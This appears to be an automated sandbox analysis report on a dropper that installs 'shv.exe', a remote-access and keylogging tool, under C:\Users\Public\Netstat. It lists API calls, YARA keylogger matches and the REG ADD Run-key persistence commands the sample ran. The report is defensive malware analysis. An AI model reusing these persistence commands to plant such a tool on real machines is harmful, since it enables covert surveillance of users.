Code function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

6_2_1101F6B0

Contains functionality to modify clipboard data

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	6_2_1101F6B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,	6_2_11032EE0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	9_2_1101F6B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,	9_2_11032EE0

Contains functionality to read the clipboard data

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,

6_2_110321E0

Contains functionality to record screenshots

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,

6_2_110076F0

Potential key logger detected (key state polling based)

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		6_2_11113880
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		9_2_11113880

Yara detected Keylogger Generic

Source: Yara match	File source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.229e94ad820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 1936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 4000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		6_2_111158B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		9_2_111158B0

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E78C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF70E78C2F0

Contains functionality to launch a process as a different user

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

6_2_1115DB40

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		6_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		9_2_1102D330

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A1F20	0_2_00007FF70E7A1F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E785E24	0_2_00007FF70E785E24
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7ACE88	0_2_00007FF70E7ACE88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E78F930	0_2_00007FF70E78F930
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E794928	0_2_00007FF70E794928
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B0754	0_2_00007FF70E7B0754
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79A4AC	0_2_00007FF70E79A4AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A3484	0_2_00007FF70E7A3484
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7AB190	0_2_00007FF70E7AB190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79AF18	0_2_00007FF70E79AF18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C2080	0_2_00007FF70E7C2080
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B0754	0_2_00007FF70E7B0754
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A8DF4	0_2_00007FF70E7A8DF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A2D58	0_2_00007FF70E7A2D58
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A4B98	0_2_00007FF70E7A4B98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E795B60	0_2_00007FF70E795B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79BB90	0_2_00007FF70E79BB90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B8C1C	0_2_00007FF70E7B8C1C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B89A0	0_2_00007FF70E7B89A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A3964	0_2_00007FF70E7A3964
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79C96C	0_2_00007FF70E79C96C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E781AA4	0_2_00007FF70E781AA4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A2AB0	0_2_00007FF70E7A2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C5AF8	0_2_00007FF70E7C5AF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E791A48	0_2_00007FF70E791A48
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BFA94	0_2_00007FF70E7BFA94
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BC838	0_2_00007FF70E7BC838
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E784840	0_2_00007FF70E784840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79B534	0_2_00007FF70E79B534
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C2550	0_2_00007FF70E7C2550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7876C0	0_2_00007FF70E7876C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A53F0	0_2_00007FF70E7A53F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A21D0	0_2_00007FF70E7A21D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79F180	0_2_00007FF70E79F180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E78C2F0	0_2_00007FF70E78C2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E78A310	0_2_00007FF70E78A310
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79126C	0_2_00007FF70E79126C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E787288	0_2_00007FF70E787288
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110733B0	6_2_110733B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11029590	6_2_11029590
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11061C90	6_2_11061C90
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11033010	6_2_11033010
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11163220	6_2_11163220
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102B5F0	6_2_1102B5F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11167485	6_2_11167485
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110454F0	6_2_110454F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101B760	6_2_1101B760
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111258B0	6_2_111258B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101BBA0	6_2_1101BBA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11087C60	6_2_11087C60
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1116DFCB	6_2_1116DFCB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11070090	6_2_11070090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11080480	6_2_11080480
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115E980	6_2_1115E980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101C9C0	6_2_1101C9C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110088AB	6_2_110088AB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11050D80	6_2_11050D80
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1CA980	6_2_6D1CA980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1F3DB8	6_2_6D1F3DB8
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1F4910	6_2_6D1F4910
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1F3923	6_2_6D1F3923
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11061C90	9_2_11061C90
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11033010	9_2_11033010
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110733B0	9_2_110733B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11163220	9_2_11163220
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11029590	9_2_11029590
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102B5F0	9_2_1102B5F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11167485	9_2_11167485
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110454F0	9_2_110454F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101B760	9_2_1101B760
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111258B0	9_2_111258B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101BBA0	9_2_1101BBA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11087C60	9_2_11087C60
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1116DFCB	9_2_1116DFCB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11070090	9_2_11070090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11080480	9_2_11080480
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115E980	9_2_1115E980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101C9C0	9_2_1101C9C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110088AB	9_2_110088AB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11050D80	9_2_11050D80

Enables security privileges

Source: C:\Users\Public\Netstat\shv.exe

Process token adjusted: Security

Jump to behavior

Found potential string decryption / allocating functions

Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 110B7A20 appears 43 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11146450 appears 1223 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1109D8C0 appears 32 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 6D1C30A0 appears 31 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11146EC0 appears 48 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 110278E0 appears 94 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 6D1D7D00 appears 67 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 6D1C6F50 appears 72 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1116F010 appears 74 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11029450 appears 2011 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 111603E3 appears 82 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11173663 appears 40 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1105DD10 appears 585 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11081BB0 appears 85 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1105DE40 appears 54 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11164010 appears 64 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehtctl32.dll2 vs file.exe
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametcctl32.dll2 vs file.exe
Source: file.exe, 00000000.00000003.2140610512.00000229E9617000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"

Source: classification engine

Classification label: mal96.rans.evad.winEXE@20/13@1/2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E78B6D8 GetLastError,FormatMessageW,LocalFree,

0_2_00007FF70E78B6D8

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	6_2_1109D440
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,	6_2_1109D4D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	9_2_1109D440
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,	9_2_1109D4D0

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,

6_2_11115B70

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7A8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF70E7A8624

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,

6_2_11127E10

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\Public\Netstat

Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: unknown	Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: unknown	Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: unknown	Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
